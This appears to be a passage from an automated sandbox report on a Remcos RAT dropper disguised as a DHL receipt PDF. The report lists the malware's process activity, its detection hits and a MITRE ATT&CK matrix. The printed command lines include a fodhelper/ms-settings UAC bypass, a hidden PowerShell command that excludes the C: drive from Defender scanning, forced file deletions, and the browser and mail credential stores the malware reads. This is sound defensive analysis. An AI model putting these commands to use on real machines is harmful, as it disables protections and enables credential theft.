              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c rmdir "C:\Windows \" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\\Windows \\System32\\per.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\ger.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\xkn.exe" / A / F / Q / S Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\huychgflg"Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\jpluazqfutyle"Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\tjrfarbgibqpoisd"Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\reg.exe "C:\\Users\\Public\\ger.exe" Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe "C:\\Users\\Public\\xkn.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\fodhelper.exe "C:\\Windows \\System32\\per.exe"
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe C:\\Users\\Public\\xkn -WindowStyle hidden -Command "C:\\Users\\Public\\alpha /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d 'C:\\Users\\Public\\xkn -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath C:\"' ; "
              Source: C:\Users\Public\xkn.exeProcess created: C:\Users\Public\alpha.exe "C:\Users\Public\alpha.exe" /c C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\ger.exe C:\\Users\\Public\\ger add HKCU\Software\Classes\ms-settings\shell\open\command /f /ve /t REG_SZ /d "C:\\Users\\Public\\xkn -WindowStyle hidden -Command Add-MpPreference -ExclusionPath C:""
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 2
              Source: C:\Users\Public\alpha.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /F /IM SystemSettings.exe
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\Public\alpha.exe c:\\users\\public\\alpha /c c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; " Jump to behavior
              Source: C:\Users\Public\alpha.exeProcess created: C:\Users\Public\xkn.exe c:\\users\\public\\xkn -windowstyle hidden -command "c:\\users\\public\\alpha /c c:\\users\\public\\ger add hkcu\software\classes\ms-settings\shell\open\command /f /ve /t reg_sz /d 'c:\\users\\public\\xkn -windowstyle hidden -command "add-mppreference -exclusionpath c:\"' ; "
              Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
              Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr]
              Source: remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000069B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerK5\
              Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managere=C:
              Source: remcos.exe, 00000005.00000002.4125282183.0000000000698000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager6
              Source: remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000002.4125282183.000000000069B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
              Source: remcos.exe, 00000005.00000003.1858721908.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.drBinary or memory string: [Program Manager]
              Source: remcos.exe, 00000005.00000002.4125282183.0000000000667000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000005.00000003.2495195911.0000000000643000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managermcos\remcos.exe
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA74C52 cpuid 0_2_2DA74C52
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_028BDAA4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028A5A78
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetLocaleInfoA,0_2_028AA7A8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetLocaleInfoA,0_2_028AA75C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028A5B84
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_028BDAA4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,0_2_028C5E01
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_2DA91CD8
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: EnumSystemLocalesW,0_2_2DA91F9B
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: EnumSystemLocalesW,0_2_2DA91F50
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetLocaleInfoW,0_2_2DA888ED
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetLocaleInfoA,0_2_2DA4F8D1
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetLocaleInfoW,0_2_2DA92543
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_2DA9243C
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: EnumSystemLocalesW,0_2_2DA88404
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_2DA92610
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_2DA920C3
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: EnumSystemLocalesW,0_2_2DA92036
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: GetLocaleInfoW,0_2_2DA92313
              Source: C:\ProgramData\Remcos\remcos.exeCode function: GetLocaleInfoA,5_2_2D5AF8D1
              Source: C:\ProgramData\Remcos\remcos.exeCode function: GetLocaleInfoW,5_2_2D5F2543
              Source: C:\ProgramData\Remcos\remcos.exeCode function: EnumSystemLocalesW,5_2_2D5E8404
              Source: C:\ProgramData\Remcos\remcos.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_2D5F243C
              Source: C:\ProgramData\Remcos\remcos.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_2D5F1CD8
              Source: C:\ProgramData\Remcos\remcos.exeCode function: EnumSystemLocalesW,5_2_2D5F1F50
              Source: C:\ProgramData\Remcos\remcos.exeCode function: EnumSystemLocalesW,5_2_2D5F1F9B
              Source: C:\ProgramData\Remcos\remcos.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_2D5F2610
              Source: C:\ProgramData\Remcos\remcos.exeCode function: EnumSystemLocalesW,5_2_2D5F2036
              Source: C:\ProgramData\Remcos\remcos.exeCode function: GetLocaleInfoW,5_2_2D5E88ED
              Source: C:\ProgramData\Remcos\remcos.exeCode function: GetLocaleInfoW,5_2_2D5F2313
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,7_2_00007FF7689C51EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,7_2_00007FF7689C3140
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,7_2_00007FF7689B6EE4
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,8_2_00007FF7689C51EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,8_2_00007FF7689C3140
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,8_2_00007FF7689B6EE4
              Source: C:\Users\Public\alpha.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,11_2_00007FF7689C51EC
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,11_2_00007FF7689C3140
              Source: C:\Users\Public\alpha.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,11_2_00007FF7689B6EE4
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Users\Public\xkn.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Users\Public\xkn.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\Public\alpha.exeQueries volume information: C:\ VolumeInformation
              Source: C:\ProgramData\Remcos\remcos.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028A91A4 GetLocalTime,0_2_028A91A4
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA5B60D GetComputerNameExW,GetUserNameW,0_2_2DA5B60D
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_2DA893AD _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_2DA893AD
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: 0_2_028AB724 GetVersionExA,0_2_028AB724
              Source: C:\Users\Public\xkn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: cmdagent.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: quhlpsvc.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgamsvr.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Vsserv.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgupsvc.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: avgemc.exe
              Source: DHL119040 receipt document,pdf.exe, 00000000.00000002.1800642637.000000007EFB0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710785065.000000007F1B0000.00000004.00001000.00020000.00000000.sdmp, DHL119040 receipt document,pdf.exe, 00000000.00000003.1710507882.000000007EB90000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: MsMpEng.exe

              Stealing of Sensitive Information

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data0_2_2DA4BA12
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\0_2_2DA4BB30
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: \key3.db0_2_2DA4BB30
              Opens network shares
              Source: C:\Users\Public\alpha.exeFile opened: \\Windows \
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
              Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
              Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
              Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
              Source: C:\ProgramData\Remcos\remcos.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Tries to steal Instant Messenger accounts or passwords
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\ProgramData\Remcos\remcos.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
              Yara detected WebBrowserPassView password recovery tool
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8144, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Detected Remcos RAT
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5Jump to behavior
              Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
              Source: C:\ProgramData\Remcos\remcos.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-0X3XK5
              Yara detected Remcos RAT
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.DHL119040 receipt document,pdf.exe.2da40000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1798684508.000000007E830000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.2020797857.00000000007DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1722944683.00000000007BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000003.2494576030.0000000000680000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000029.00000002.1940219819.00000000007F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1767752982.000000002DA40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: DHL119040 receipt document,pdf.exe PID: 7380, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 7596, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 8132, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: remcos.exe PID: 3844, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\trhrth\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\DHL119040 receipt document,pdf.exeCode function: cmd.exe0_2_2DA4569A

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting              		1
              Valid Accounts              		1
              Windows Management Instrumentation              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		1
              Software Packing              		2
              OS Credential Dumping              		2
              System Time Discovery              		Remote Services11
              Archive Collected Data              		213
              Application Layer Protocol              		Exfiltration Over Other Network Medium1
              System Shutdown/Reboot
              CredentialsDomainsDefault Accounts1
              Shared Modules              		1
              Valid Accounts              		1
              Valid Accounts              		1
              Timestomp              		1
              Credentials in Registry              		1
              Account Discovery              		Remote Desktop Protocol1
              Data from Local System              		12
              Ingress Tool Transfer              		Exfiltration Over Bluetooth1
              Defacement
              Email AddressesDNS ServerDomain Accounts11
              Native API              		21
              Registry Run Keys / Startup Folder              		21
              Registry Run Keys / Startup Folder              		1
              DLL Side-Loading              		3
              Credentials In Files              		1
              System Service Discovery              		SMB/Windows Admin Shares1
              Email Collection              		21
              Encrypted Channel              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts22
              Command and Scripting Interpreter              		1
              Scripting              		1
              Abuse Elevation Control Mechanism              		1
              File Deletion              		211
              Input Capture              		1
              System Network Connections Discovery              		Distributed Component Object Model3
              Clipboard Data              		1
              Non-Standard Port              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              Service Execution              		1
              Windows Service              		1
              Bypass User Account Control              		331
              Masquerading              		LSA Secrets4
              File and Directory Discovery              		SSH211
              Input Capture              		1
              Remote Access Software              		Scheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
              Access Token Manipulation              		1
              Valid Accounts              		Cached Domain Credentials49
              System Information Discovery              		VNCGUI Input Capture2
              Non-Application Layer Protocol              		Data Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
              Windows Service              		211
              Disable or Modify Tools              		DCSync1
